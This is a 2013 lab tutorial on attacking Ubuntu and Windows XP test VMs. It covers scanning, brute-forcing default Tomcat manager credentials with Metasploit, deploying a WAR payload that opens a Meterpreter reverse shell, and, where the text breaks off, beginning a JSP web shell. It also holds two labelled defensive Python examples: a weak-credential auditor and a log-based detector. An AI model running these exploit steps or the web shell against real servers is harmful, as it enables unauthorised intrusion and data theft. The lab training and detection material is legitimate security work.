Exploitation Ubuntu - Windows Services

June 27, 2013 by Fotis Liatsis

This tutorial describes the basic principles of gathering information in order to exploit vulnerable machines, here an Ubuntu Server and a Windows XP machine. Both systems have vulnerable services installed, such as Tomcat Java and the Samba file server, or vulnerable databases such as PostgreSQL on the Ubuntu machine and MySQL on the Windows machine.

This tutorial outlines many of the security flaws on both OS machines, such as:

  • Gathering information
  • Identify open network services
  • Exploit vulnerable services

(Note: For the purposes of this tutorial, BackBox (based on Ubuntu) is used as the OS, together with the latest installation package of Oracle VM VirtualBox and Ubuntu 9.04 / Windows XP SP2 as the target systems.)

Setting Up VM – Manual ifconfig

Before starting the penetration test on the VMs, we'll set up and configure a couple of things on each virtual machine. After creating each machine (both Ubuntu and Windows), click the "Settings" button and navigate to the "Network" tab. For the network interface, choose "Host-only Adapter"; the vboxnet0 option is then set automatically.

Next we'll set up the eth0 interface on the Ubuntu machine. In the terminal, type:

[c]
ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up
[/c]

If you would like the network settings to be assigned statically, without entering them manually each time, edit the /etc/network/interfaces file for the appropriate Ethernet device.

[c]
# The host-only network interface
auto eth0
iface eth0 inet static
    address 192.168.56.102
    netmask 255.255.255.0
    network 192.168.56.0
    broadcast 192.168.56.255
[/c]

(Note: Be sure to restart the networking service after modifying this file: /etc/init.d/networking restart.)

Next you will set up the Windows network interface. On the command prompt type cmd and click "OK".

Then navigate to the Network Connections panel.

Next, in the properties panel, choose "Internet Protocol (TCP/IP)" and click "Properties". On the "General" tab choose "Use the following IP address" and add the appropriate network information (see below):

Next, at the command prompt, enter the following command to verify the adapter options:

[c]
ipconfig /all
[/c]

Verifying connectivity

We will ping the machines to verify connectivity. If everything is configured correctly, you should see output along the lines of the following:

Ubuntu Machine:

[c]
root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
--- 192.168.56.102 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms
[/c]

And

[c]
root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
--- 192.168.56.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms
[/c]

Windows Machine:

[c]
root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
--- 192.168.56.103 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms
[/c]

And

[c]
C:\Documents and Settings\windowsxp>ping 192.168.56.1

Pinging 192.168.56.1 with 32 bytes of data:

Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.56.1
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
[/c]

Gathering Information - Ubuntu Machine

We'll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we perform a simple scan to determine which ports are open on the target system, using the -p- option to cover all 65,535 TCP ports.

[c]
root@wizard32:~# nmap -p- 192.168.56.102

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
[/c]

Looking at the results, we can see that there are many open ports. Let's use another tool to find out a little more about the machine, starting with port 8180.

[c]
root@wizard32:~# nikto -h 192.168.56.102 -p 8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 8180
+ Start Time: 2013-06-19 14:04:00
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2013-06-19 14:05:24 (84 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[/c]

Exploit Vulnerable Backdoors

Reviewing the output closely, we can see that port 8180/tcp runs an Apache Tomcat server. We can identify the version of the Apache Tomcat server using Metasploit.

[c]
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run

[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, Apache Tomcat/5.5 is used. Using Metasploit once more, we'll try to log in to the Apache Tomcat Manager with a set of default username/password combinations:

[c]
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run

[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'
[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'
[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]
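The one successful login in the output above is a manager account whose password equals its username. As an added example (not part of the original tutorial), the following Python script audits a tomcat-users.xml file for such accounts; the sample file, the role list and the function name `audit_tomcat_users` are constructed for illustration, and the password list is the set of values tried in the scanner output above.

```python
import xml.etree.ElementTree as ET

# Roles that open the Manager/Admin web applications. "manager" and "admin" are
# the names used by older Tomcat releases; the hyphenated names are used by
# Tomcat 7 and later.
PRIVILEGED_ROLES = {
    "manager", "admin", "manager-gui", "manager-script",
    "manager-jmx", "manager-status", "admin-gui", "admin-script",
}

# Passwords tried by the tomcat_mgr_login run shown above.
KNOWN_DEFAULTS = {
    "admin", "manager", "role1", "root", "tomcat", "both", "j2deployer",
    "ovwebusr", "cxsdk", "ADMIN", "xampp", "OvW*busr1", "kdsxc", "owaspbwa",
    "s3cret",
}

# Constructed sample file, not taken from the lab machine.
SAMPLE_TOMCAT_USERS = """
<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="s3cret" roles="tomcat,role1"/>
  <user name="deploy" password="Xk7#pQ2v!mR9" roles="manager"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per account with an empty, mirrored or default password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        # Older files use name=, newer ones username=.
        user = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        if password == "":
            reason = "empty password"
        elif password.lower() == user.lower():
            reason = "password equals username"
        elif password in KNOWN_DEFAULTS:
            reason = "password is on a common default list"
        else:
            continue
        findings.append({
            "user": user,
            # An account that can reach the manager can deploy code.
            "severity": "high" if roles & PRIVILEGED_ROLES else "low",
            "reason": reason,
            "roles": sorted(roles),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Accounts flagged as high should be removed or given a unique password, and the manager application is best restricted to administrative source addresses.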

Reviewing the tomcat_mgr_login output, we can see that the Apache Tomcat server accepts the string "tomcat" as both username and password. Based on this result, let's exploit it:

[c]
msf> use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war ...
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp...
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT ...
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
::
:
[/c]
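From the defender's side, the sequence above (a burst of failed manager logins, one success, then a deploy followed seconds later by an undeploy) is visible in the Tomcat access log. The following detection is an added example, not part of the original tutorial; it assumes the access log is written in the common log format, and the log lines, thresholds and alert names are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Common log format: ip ident user [time] "METHOD target proto" status bytes
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Manager endpoints that install or remove an application (text and HTML interface).
DEPLOY = {"/manager/deploy", "/manager/html/upload"}
UNDEPLOY = {"/manager/undeploy", "/manager/html/undeploy"}

# Constructed sample: 16 failed logins, a success, then deploy and quick undeploy.
SAMPLE_LOG = [
    f'192.168.56.1 - - [18/Jun/2013:15:29:{s:02d} +0300] "GET /manager/html HTTP/1.1" 401 954'
    for s in range(16)
] + [
    '192.168.56.1 - tomcat [18/Jun/2013:15:29:16 +0300] "GET /manager/html HTTP/1.1" 200 11500',
    '192.168.56.1 - tomcat [18/Jun/2013:15:30:50 +0300] "PUT /manager/deploy?path=/EXAMPLEAPP HTTP/1.1" 200 45',
    '192.168.56.1 - - [18/Jun/2013:15:30:51 +0300] "GET /EXAMPLEAPP/page.jsp HTTP/1.1" 200 0',
    '192.168.56.1 - tomcat [18/Jun/2013:15:30:52 +0300] "GET /manager/undeploy?path=/EXAMPLEAPP HTTP/1.1" 200 47',
    '192.168.56.50 - admin2 [18/Jun/2013:16:00:00 +0300] "GET /manager/html HTTP/1.1" 200 11500',
]


def detect_manager_abuse(lines, fail_threshold=10,
                         window=timedelta(minutes=5),
                         short_lived=timedelta(seconds=60)):
    """Return (alert, client_ip, detail) tuples for suspicious manager activity."""
    failures = defaultdict(deque)   # client ip -> timestamps of recent 401s
    guessed = {}                    # client ip -> time a login followed a 401 burst
    deployed = {}                   # context path -> time it was deployed
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.startswith("/manager/"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, status = m["ip"], int(m["status"])
        recent = failures[ip]
        while recent and ts - recent[0] > window:   # slide the window forward
            recent.popleft()
        if status == 401:
            recent.append(ts)
            continue
        if status >= 400:
            continue
        # A success right after many failures means a guess landed.
        if len(recent) >= fail_threshold and ip not in guessed:
            guessed[ip] = ts
            alerts.append(("guessing-succeeded", ip, m["user"]))
        app = parse_qs(url.query).get("path", ["?"])[0]
        if url.path in DEPLOY:
            after_guess = ip in guessed and ts - guessed[ip] <= window
            alerts.append(("deploy-after-guessing" if after_guess else "deploy", ip, app))
            deployed[app] = ts
        elif (url.path in UNDEPLOY and app in deployed
              and ts - deployed[app] <= short_lived):
            # Installed and removed within a minute: typical of a staged payload.
            alerts.append(("short-lived-app", ip, app))
    return alerts


if __name__ == "__main__":
    for alert in detect_manager_abuse(SAMPLE_LOG):
        print(alert)
```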

Vulnerable Web Service

Open a browser and enter the IP of the VM together with the port of the Apache Tomcat server (IP:Port).

Next, click "Tomcat Manager" in the Administration panel on the left and enter the string "tomcat" as both username and password.

Next we'll create and upload a .war file that gives us the ability to execute commands on the server. Create a cmd_shell.jsp file containing the following code:

[js]
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML>
<TITLE>JSP Shell</TITLE>
